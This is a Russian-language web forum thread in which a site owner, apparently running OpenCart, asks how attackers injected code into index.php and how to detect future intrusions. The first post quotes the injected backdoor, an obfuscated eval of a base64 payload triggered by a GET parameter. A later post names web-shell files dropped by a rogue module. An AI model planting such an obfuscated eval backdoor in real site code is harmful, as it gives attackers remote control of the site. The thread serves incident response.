Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Заражение сайта. Поиск дыры.


Recommended Posts

Приветствую!

 

Кто сталкивался? К index.php прицепилась такая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было прицеплено, мне пока не известна. Так жить дальше нельзя.

 

Возможно кто-то сталкивался с подобным, буду благодарен за дельный совет, как пролезли, как закрыть дыру.

 

Всем спасибо!

Надіслати
Поділитися на інших сайтах


34 минуты назад, nikifalex сказал:

а что вы в них будете анализировать?

странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен.

Надіслати
Поділитися на інших сайтах


1 час назад, Anton999 сказал:

странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен.

 

Я вам могу посоветовать обратиться к тем кто знает как это делать. Если опыта у вас не много, то логи для вас будут непонятными заклинаниями.

 

Ну и https://revisium.com/ai/ скачайте на сайт и проверьте... Если найдете shell через который это все сделано, тогда в логах будет проще дыру найти 

Змінено користувачем Jurgen
Надіслати
Поділитися на інших сайтах


Пока я обнаружил несанкционированную установку модуля "rsz.ocmod.zip". Которая тащила с собой:
- admin/controller/extension/extension/f.php
- admin/controller/extension/extension/spyshell.php
- admin/controller/extension/extension/uploader.php
- и пр.
разбираюсь дальше...

Надіслати
Поділитися на інших сайтах


итак.. Логов за дату взлома у провайдера не сохранилось. Дальнейшее расследование ни к чему не приведёт. Вопрос по поиску дыры - закрыт.

 

По поводу паролей и пр. - всё чисто/пушисто/надёжно. Никакого левака, никакой халявы, никаких других лиц. Поэтому хочу задать другой вопрос..

 

Как оперативно получить информацию о том, что на сайте произведены несанкционированные действия или железно предотвратить их?

 

 

 

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.